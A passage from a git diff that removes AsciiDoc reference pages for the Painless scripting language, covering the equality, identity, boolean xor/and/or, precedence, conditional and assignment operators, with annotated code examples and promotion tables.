- | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Equality equals with the `boolean` type. -+ -[source,Painless] ----- -boolean a = true; <1> -boolean b = false; <2> -a = a == false; <3> -b = a == b; <4> ----- -+ -<1> declare `boolean a`; - store `boolean true` to `a` -<2> declare `boolean b`; - store `boolean false` to `b` -<3> load from `a` -> `boolean true`; - equality equals `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `a` -<4> load from `a` -> `boolean false @0`; - load from `b` -> `boolean false @1`; - equality equals `boolean false @0` and `boolean false @1` - -> `boolean false`; - store `boolean false` to `b` -+ -* Equality equals with primitive types. -+ -[source,Painless] ----- -int a = 1; <1> -double b = 2.0; <2> -boolean c = a == b; <3> -c = 1 == a; <4> ----- -+ -<1> declare `int a`; - store `int 1` to `a` -<2> declare `double b`; - store `double 1.0` to `b` -<3> declare `boolean c`; - load from `a` -> `int 1`; - load from `b` -> `double 2.0`; - promote `int 1` and `double 2.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double `1.0`; - equality equals `double 1.0` and `double 2.0` -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `int 1 @1`; - equality equals `int 1 @0` and `int 1 @1` -> `boolean true`; - store `boolean true` to `c` -+ -* Equal equals with reference types. 
-+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -a.add(1); <3> -boolean c = a == b; <4> -b.add(1); <5> -c = a == b; <6> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - call `add` on `List reference` with arguments (`int 1)` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean false`; - store `boolean false` to `c` -<5> load from `b` -> `List reference`; - call `add` on `List reference` with arguments (`int 1`) -<6> load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - call `equals` on `List reference @0` with arguments (`List reference @1`) - -> `boolean true`; - store `boolean true` to `c` -+ -* Equality equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a == null; <3> -c = a == b; <4> -b = new Object(); <5> -c = a == b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - equality equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - equality equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - call `equals` on `Object reference` with arguments (`null`) - -> `boolean false`; - store `boolean false` to `c` -+ -* Equality equals with the `def` type. 
-+ -[source, Painless] ----- -def a = 0; <1> -def b = 1; <2> -boolean c = a == b; <3> -def d = new HashMap(); <4> -def e = new ArrayList(); <5> -c = d == e; <6> ----- -+ -<1> declare `def a`; - implicit cast `int 0` to `def` -> `def`; - store `def` to `a`; -<2> declare `def b`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `b`; -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `a` to `int 0` -> `int 0`; - load from `b` -> `def`; - implicit cast `b` to `int 1` -> `int 1`; - equality equals `int 0` and `int 1` -> `boolean false`; - store `boolean false` to `c` -<4> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d`; -<5> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d`; -<6> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `e` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `equals` on `HashMap reference` with arguments (`ArrayList reference`) - -> `boolean false`; - store `boolean false` to `c` - -[[equality-not-equals-operator]] -==== Equality Not Equals - -Use the `equality not equals operator '!='` to COMPARE two values where a -resultant `boolean` type value is `true` if the two values are NOT equal and -`false` otherwise. The member method, `equals`, is implicitly called when the -values are reference type values where the first value is the target of the call -and the second value is the argument with the resultant `boolean` type value -flipped. This operation is `null-safe` where if both values are `null` the -resultant `boolean` type value is `false`, and if only one value is `null` the -resultant `boolean` type value is `true`. A valid comparison is between boolean -type values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -equality_not_equals: expression '!=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Equality not equals with the `boolean` type. 
-+
-[source,Painless]
----
-boolean a = true; <1>
-boolean b = false; <2>
-a = a != false; <3>
-b = a != b; <4>
----
-+
-<1> declare `boolean a`;
-    store `boolean true` to `a`
-<2> declare `boolean b`;
-    store `boolean false` to `b`
-<3> load from `a` -> `boolean true`;
-    equality not equals `boolean true` and `boolean false` -> `boolean true`;
-    store `boolean true` to `a`
-<4> load from `a` -> `boolean true`;
-    load from `b` -> `boolean false`;
-    equality not equals `boolean true` and `boolean false` -> `boolean true`;
-    store `boolean true` to `b`
-+
-* Equality not equals with primitive types.
-+
-[source,Painless]
----
-int a = 1; <1>
-double b = 2.0; <2>
-boolean c = a != b; <3>
-c = 1 != a; <4>
----
-+
-<1> declare `int a`;
-    store `int 1` to `a`
-<2> declare `double b`;
-    store `double 2.0` to `b`
-<3> declare `boolean c`;
-    load from `a` -> `int 1`;
-    load from `b` -> `double 2.0`;
-    promote `int 1` and `double 2.0`: result `double`;
-    implicit cast `int 1` to `double 1.0` -> `double 1.0`;
-    equality not equals `double 1.0` and `double 2.0` -> `boolean true`;
-    store `boolean true` to `c`
-<4> load from `a` -> `int 1 @1`;
-    equality not equals `int 1 @0` and `int 1 @1` -> `boolean false`;
-    store `boolean false` to `c`
-+
-* Equality not equals with reference types.
-+
-[source,Painless]
----
-List a = new ArrayList(); <1>
-List b = new ArrayList(); <2>
-a.add(1); <3>
-boolean c = a != b; <4>
-b.add(1); <5>
-c = a != b; <6>
----
-+
-<1> declare `List a`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `List reference` -> `List reference`;
-    store `List reference` to `a`
-<2> declare `List b`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `List reference` -> `List reference`;
-    store `List reference` to `b`
-<3> load from `a` -> `List reference`;
-    call `add` on `List reference` with arguments (`int 1`)
-<4> declare `boolean c`;
-    load from `a` -> `List reference @0`;
-    load from `b` -> `List reference @1`;
-    call `equals` on `List reference @0` with arguments (`List reference @1`)
-        -> `boolean false`;
-    boolean not `boolean false` -> `boolean true`;
-    store `boolean true` to `c`
-<5> load from `b` -> `List reference`;
-    call `add` on `List reference` with arguments (`int 1`)
-<6> load from `a` -> `List reference @0`;
-    load from `b` -> `List reference @1`;
-    call `equals` on `List reference @0` with arguments (`List reference @1`)
-        -> `boolean true`;
-    boolean not `boolean true` -> `boolean false`;
-    store `boolean false` to `c`
-+
-* Equality not equals with `null`.
-+
-[source,Painless]
----
-Object a = null; <1>
-Object b = null; <2>
-boolean c = a != null; <3>
-c = a != b; <4>
-b = new Object(); <5>
-c = a != b; <6>
----
-+
-<1> declare `Object a`;
-    store `null` to `a`
-<2> declare `Object b`;
-    store `null` to `b`
-<3> declare `boolean c`;
-    load from `a` -> `null @0`;
-    equality not equals `null @0` and `null @1` -> `boolean false`;
-    store `boolean false` to `c`
-<4> load from `a` -> `null @0`;
-    load from `b` -> `null @1`;
-    equality not equals `null @0` and `null @1` -> `boolean false`;
-    store `boolean false` to `c`
-<5> allocate `Object` instance -> `Object reference`;
-    store `Object reference` to `b`
-<6> load from `a` -> `Object reference`;
-    load from `b` -> `null`;
-    call `equals` on `Object reference` with arguments (`null`)
-        -> `boolean false`;
-    boolean not `boolean false` -> `boolean true`;
-    store `boolean true` to `c`
-+
-* Equality not equals with the `def` type.
-+
-[source,Painless]
----
-def a = 0; <1>
-def b = 1; <2>
-boolean c = a != b; <3>
-def d = new HashMap(); <4>
-def e = new ArrayList(); <5>
-c = d != e; <6>
----
-+
-<1> declare `def a`;
-    implicit cast `int 0` to `def` -> `def`;
-    store `def` to `a`
-<2> declare `def b`;
-    implicit cast `int 1` to `def` -> `def`;
-    store `def` to `b`
-<3> declare `boolean c`;
-    load from `a` -> `def`;
-    implicit cast `def` to `int 0` -> `int 0`;
-    load from `b` -> `def`;
-    implicit cast `def` to `int 1` -> `int 1`;
-    equality not equals `int 0` and `int 1` -> `boolean true`;
-    store `boolean true` to `c`
-<4> declare `def d`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    implicit cast `HashMap reference` to `def` -> `def`;
-    store `def` to `d`
-<5> declare `def e`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `def` -> `def`;
-    store `def` to `e`
-<6> load from `d` -> `def`;
-    implicit cast `def` to `HashMap reference` -> `HashMap reference`;
-    load from `e` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `equals` on `HashMap reference` with arguments (`ArrayList reference`)
-        -> `boolean false`;
-    boolean not `boolean false` -> `boolean true`;
-    store `boolean true` to `c`
-
-[[identity-equals-operator]]
-==== Identity Equals
-
-Use the `identity equals operator '==='` to COMPARE two values where a resultant
-`boolean` type value is `true` if the two values are equal and `false`
-otherwise. A reference type value is equal to another reference type value if
-both values refer to the same instance on the heap or if both values are `null`.
-A valid comparison is between `boolean` type values, numeric type values, or
-reference type values.
-
-*Errors*
-
-* If a comparison is made between a `boolean` type value and a numeric type value.
-* If a comparison is made between a primitive type value and a reference type
-  value.
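-
-As an illustrative sketch (an addition to the original examples), the following
-contrasts the equality equals operator, which calls `equals` and compares
-contents, with the identity equals operator, which compares heap instances:
-
-[source,Painless]
----
-List a = new ArrayList();
-List b = new ArrayList();
-a.add(1);
-b.add(1);
-boolean byValue = a == b;     // `boolean true`: `equals` is called and the contents match
-boolean byIdentity = a === b; // `boolean false`: `a` and `b` refer to different instances
----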
- -*Grammar* - -[source,ANTLR4] ----- -identity_equals: expression '===' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Identity equals with reference types. -+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -List c = a; <3> -boolean c = a === b; <4> -c = a === c; <5> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - store `List reference` to `c` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - identity equals `List reference @0` and `List reference @1` - -> `boolean false` - store `boolean false` to `c` -<5> load from `a` -> `List reference @0`; - load from `c` -> `List reference @1`; - identity equals `List reference @0` and `List reference @1` - -> `boolean true` - store `boolean true` to `c` - (note `List reference @0` and `List reference @1` refer to the same - instance) -+ -* Identity equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a === null; <3> -c = a === b; <4> -b = new Object(); <5> -c = a === b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - identity equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - identity equals `null @0` and `null @1` -> `boolean true`; - store `boolean true` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - identity equals `Object reference` and `null` -> `boolean false`; - store `boolean false` to `c` -+ -* Identity equals with the `def` type. 
-+ -[source, Painless] ----- -def a = new HashMap(); <1> -def b = new ArrayList(); <2> -boolean c = a === b; <3> -b = a; <4> -c = a === b; <5> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d` -<2> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d` -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `b` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - identity equals `HashMap reference` and `ArrayList reference` - -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `def`; - store `def` to `b` -<5> load from `a` -> `def`; - implicit cast `def` to `HashMap reference @0` -> `HashMap reference @0`; - load from `b` -> `def`; - implicit cast `def` to `HashMap reference @1` -> `HashMap reference @1`; - identity equals `HashMap reference @0` and `HashMap reference @1` - -> `boolean true`; - store `boolean true` to `b`; - (note `HashMap reference @0` and `HashMap reference @1` refer to the same - instance) - -[[identity-not-equals-operator]] -==== Identity Not Equals - -Use the `identity not equals operator '!=='` to COMPARE two values where a -resultant `boolean` type value is `true` if the two values are NOT equal and -`false` otherwise. A reference type value is not equal to another reference type -value if both values refer to different instances on the heap or if one value is -`null` and the other is not. A valid comparison is between `boolean` type -values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -identity_not_equals: expression '!==' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | - | Object | def -| def | def | def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Identity not equals with reference type values. 
-+ -[source,Painless] ----- -List a = new ArrayList(); <1> -List b = new ArrayList(); <2> -List c = a; <3> -boolean c = a !== b; <4> -c = a !== c; <5> ----- -+ -<1> declare `List a`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `a` -<2> declare `List b`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `b` -<3> load from `a` -> `List reference`; - store `List reference` to `c` -<4> declare `boolean c`; - load from `a` -> `List reference @0`; - load from `b` -> `List reference @1`; - identity not equals `List reference @0` and `List reference @1` - -> `boolean true` - store `boolean true` to `c` -<5> load from `a` -> `List reference @0`; - load from `c` -> `List reference @1`; - identity not equals `List reference @0` and `List reference @1` - -> `boolean false` - store `boolean false` to `c` - (note `List reference @0` and `List reference @1` refer to the same - instance) -+ -* Identity not equals with `null`. -+ -[source,Painless] ----- -Object a = null; <1> -Object b = null; <2> -boolean c = a !== null; <3> -c = a !== b; <4> -b = new Object(); <5> -c = a !== b; <6> ----- -+ -<1> declare `Object a`; - store `null` to `a` -<2> declare `Object b`; - store `null` to `b` -<3> declare `boolean c`; - load from `a` -> `null @0`; - identity not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<4> load from `a` -> `null @0`; - load from `b` -> `null @1`; - identity not equals `null @0` and `null @1` -> `boolean false`; - store `boolean false` to `c` -<5> allocate `Object` instance -> `Object reference`; - store `Object reference` to `b` -<6> load from `a` -> `Object reference`; - load from `b` -> `null`; - identity not equals `Object reference` and `null` -> `boolean true`; - store `boolean true` to `c` -+ -* Identity not equals with the `def` type. 
-+ -[source, Painless] ----- -def a = new HashMap(); <1> -def b = new ArrayList(); <2> -boolean c = a !== b; <3> -b = a; <4> -c = a !== b; <5> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def` - store `def` to `d` -<2> declare `def e`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def` - store `def` to `d` -<3> declare `boolean c`; - load from `a` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - load from `b` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - identity not equals `HashMap reference` and `ArrayList reference` - -> `boolean true`; - store `boolean true` to `c` -<4> load from `a` -> `def`; - store `def` to `b` -<5> load from `a` -> `def`; - implicit cast `def` to `HashMap reference @0` -> `HashMap reference @0`; - load from `b` -> `def`; - implicit cast `def` to `HashMap reference @1` -> `HashMap reference @1`; - identity not equals `HashMap reference @0` and `HashMap reference @1` - -> `boolean false`; - store `boolean false` to `b`; - (note `HashMap reference @0` and `HashMap reference @1` refer to the same - instance) - -[[boolean-xor-operator]] -==== Boolean Xor - -Use the `boolean xor operator '^'` to XOR together two `boolean` type values -where if one `boolean` type value is `true` and the other is `false` the -resultant `boolean` type value is `true` and `false` otherwise. - -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | false | true -| false | true | false -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_xor: expression '^' expression; ----- - -*Examples* - -* Boolean xor with the `boolean` type. -+ -[source,Painless] ----- -boolean x = false; <1> -boolean y = x ^ true; <2> -y = y ^ x; <3> ----- -+ -<1> declare `boolean x`; - store `boolean false` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean false` - boolean xor `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `y` -<3> load from `y` -> `boolean true @0`; - load from `x` -> `boolean true @1`; - boolean xor `boolean true @0` and `boolean true @1` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean xor with the `def` type. -+ -[source,Painless] ----- -def x = false; <1> -def y = x ^ true; <2> -y = y ^ x; <3> ----- -+ -<1> declare `def x`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean false`; - boolean xor `boolean false` and `boolean true` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> load from `y` -> `def`; - implicit cast `def` to `boolean true @0` -> `boolean true @0`; - load from `x` -> `def`; - implicit cast `def` to `boolean true @1` -> `boolean true @1`; - boolean xor `boolean true @0` and `boolean true @1` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` - -[[boolean-and-operator]] -==== Boolean And - -Use the `boolean and operator '&&'` to AND together two `boolean` type values -where if both `boolean` type values are `true` the resultant `boolean` type -value is `true` and `false` otherwise. 
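-
-As a brief illustrative sketch (not part of the original examples), the boolean
-and operator is often combined with the comparison operators described earlier
-to build a compound condition:
-
-[source,Painless]
----
-int x = 10;
-boolean inRange = x >= 0 && x < 100; // `boolean true` only when both comparisons evaluate to `boolean true`
----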
- -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | true | false -| false | false | false -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_and: expression '&&' expression; ----- - -*Examples* - -* Boolean and with the `boolean` type. -+ -[source,Painless] ----- -boolean x = true; <1> -boolean y = x && true; <2> -x = false; <3> -y = y && x; <4> ----- -+ -<1> declare `boolean x`; - store `boolean true` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean true @0`; - boolean and `boolean true @0` and `boolean true @1` -> `boolean true`; - store `boolean true` to `y` -<3> store `boolean false` to `x` -<4> load from `y` -> `boolean true`; - load from `x` -> `boolean false`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean and with the `def` type. -+ -[source,Painless] ----- -def x = true; <1> -def y = x && true; <2> -x = false; <3> -y = y && x; <4> ----- -+ -<1> declare `def x`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean true @0` -> `boolean true @0`; - boolean and `boolean true @0` and `boolean true @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> implicit cast `boolean false` to `def` -> `def`; - store `def` to `x`; -<4> load from `y` -> `def`; - implicit cast `def` to `boolean true` -> `boolean true`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean false`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` - -[[boolean-or-operator]] -==== Boolean Or - -Use the `boolean or operator '||'` to OR together two `boolean` type values -where if either one of the `boolean` type values is `true` the resultant -`boolean` type value is `true` and `false` otherwise. - -*Errors* - -* If either evaluated value is a value other than a `boolean` type value or - a value that is castable to a `boolean` type value. - -*Truth* - -[cols="^1,^1,^1"] -|==== -| | true | false -| true | true | true -| false | true | false -|==== - -*Grammar:* -[source,ANTLR4] ----- -boolean_and: expression '||' expression; ----- - -*Examples* - -* Boolean or with the `boolean` type. -+ -[source,Painless] ----- -boolean x = false; <1> -boolean y = x || true; <2> -y = false; <3> -y = y || x; <4> ----- -+ -<1> declare `boolean x`; - store `boolean false` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean false`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `y` -<3> store `boolean false` to `y` -<4> load from `y` -> `boolean false @0`; - load from `x` -> `boolean false @1`; - boolean or `boolean false @0` and `boolean false @1` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean or with the `def` type. 
-+ -[source,Painless] ----- -def x = false; <1> -def y = x || true; <2> -y = false; <3> -y = y || x; <4> ----- -+ -<1> declare `def x`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `boolean false` -> `boolean true`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `y` -<3> implicit cast `boolean false` to `def` -> `def`; - store `def` to `y`; -<4> load from `y` -> `def`; - implicit cast `def` to `boolean false @0` -> `boolean false @0`; - load from `x` -> `def`; - implicit cast `def` to `boolean false @1` -> `boolean false @1`; - boolean or `boolean false @0` and `boolean false @1` -> `boolean false`; - implicit cast `boolean false` -> `def`; - store `def` to `y` diff --git a/docs/painless/painless-lang-spec/painless-operators-general.asciidoc b/docs/painless/painless-lang-spec/painless-operators-general.asciidoc deleted file mode 100644 index 6c17e36b3fc..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-general.asciidoc +++ /dev/null @@ -1,432 +0,0 @@ -[[painless-operators-general]] -=== Operators: General - -[[precedence-operator]] -==== Precedence - -Use the `precedence operator '()'` to guarantee the order of evaluation for an -expression. An expression encapsulated by the precedence operator (enclosed in -parentheses) overrides existing precedence relationships between operators and -is evaluated prior to other expressions in inward-to-outward order. - -*Grammar* - -[source,ANTLR4] ----- -precedence: '(' expression ')'; ----- - -*Examples* - -* Precedence with numeric operators. -+ -[source,Painless] ----- -int x = (5+4)*6; <1> -int y = 12/(x-50); <2> ----- -+ -<1> declare `int x`; - add `int 5` and `int 4` -> `int 9`; - multiply `int 9` and `int 6` -> `int 54`; - store `int 54` to `x`; - (note the add is evaluated before the multiply due to the precedence - operator) -<2> declare `int y`; - load from `x` -> `int 54`; - subtract `int 50` from `int 54` -> `int 4`; - divide `int 12` by `int 4` -> `int 3`; - store `int 3` to `y`; - (note the subtract is evaluated before the divide due to the precedence - operator) - -[[function-call-operator]] -==== Function Call - -Use the `function call operator ()` to call an existing function. A -<> is defined within a script. - -*Grammar* - -[source,ANTLR4] ----- -function_call: ID '(' ( expression (',' expression)* )? ')''; ----- - -*Examples* - -* A function call. -+ -[source,Painless] ----- -int add(int x, int y) { <1> - return x + y; - } - -int z = add(1, 2); <2> ----- -+ -<1> define function `add` that returns `int` and has parameters (`int x`, - `int y`) -<2> declare `int z`; - call `add` with arguments (`int 1`, `int 2`) -> `int 3`; - store `int 3` to `z` - -[[cast-operator]] -==== Cast - -An explicit cast converts the value of an original type to the equivalent value -of a target type forcefully as an operation. Use the `cast operator '()'` to -specify an explicit cast. Refer to <> for more -information. - -[[conditional-operator]] -==== Conditional - -A conditional consists of three expressions. The first expression is evaluated -with an expected boolean result type. If the first expression evaluates to true -then the second expression will be evaluated. If the first expression evaluates -to false then the third expression will be evaluated. The second and third -expressions will be <> if the evaluated values are not the -same type. 
Use the `conditional operator '? :'` as a shortcut to avoid the need -for a full if/else branch in certain expressions. - -*Errors* - -* If the first expression does not evaluate to a boolean type value. -* If the values for the second and third expressions cannot be promoted. - -*Grammar* - -[source,ANTLR4] ----- -conditional: expression '?' expression ':' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | Reference | def -| byte | int | int | int | int | long | float | double | - | def -| short | int | int | int | int | long | float | double | - | def -| char | int | int | int | int | long | float | double | - | def -| int | int | int | int | int | long | float | double | - | def -| long | long | long | long | long | long | float | double | - | def -| float | float | float | float | float | float | float | double | - | def -| double | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | - | - | - | Object @ | def -| def | def | def | def | def | def | def | def | def | def -|==== - -@ If the two reference type values are the same then this promotion will not -occur. - -*Examples* - -* Evaluation of conditionals. -+ -[source,Painless] ----- -boolean b = true; <1> -int x = b ? 1 : 2; <2> -List y = x > 1 ? new ArrayList() : null; <3> -def z = x < 2 ? x : 2.0; <4> ----- -+ -<1> declare `boolean b`; - store `boolean true` to `b` -<2> declare `int x`; - load from `b` -> `boolean true` - evaluate 1st expression: `int 1` -> `int 1`; - store `int 1` to `x` -<3> declare `List y`; - load from `x` -> `int 1`; - `int 1` greater than `int 1` -> `boolean false`; - evaluate 2nd expression: `null` -> `null`; - store `null` to `y`; -<4> declare `def z`; - load from `x` -> `int 1`; - `int 1` less than `int 2` -> `boolean true`; - evaluate 1st expression: load from `x` -> `int 1`; - promote `int 1` and `double 2.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double 1.0`; - implicit cast `double 1.0` to `def` -> `def`; - store `def` to `z`; - -[[assignment-operator]] -==== Assignment - -Use the `assignment operator '='` to store a value in a variable or reference -type member field for use in subsequent operations. Any operation that produces -a value can be assigned to any variable/field as long as the -<> are the same or the resultant type can be -<> to the variable/field type. - -See <> for examples using variables. - -*Errors* - -* If the type of value is unable to match the type of variable or field. - -*Grammar* - -[source,ANTLR4] ----- -assignment: field '=' expression ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member fields: - * int x - * def y - * List z ----- - -* Field assignments of different type values. 
-+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = 2.0; <3> -example.z = new ArrayList(); <4> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference`; - implicit cast `double 2.0` to `def` -> `def`; - store `def` to `y` of `Example reference` -<4> load from `example` -> `Example reference`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `z` of `Example reference` -+ -* A field assignment from a field access. -+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = example.x; <3> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `x` of `Example reference @1` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` of `Example reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) - -[[compound-assignment-operator]] -==== Compound Assignment - -Use the `compound assignment operator '$='` as a 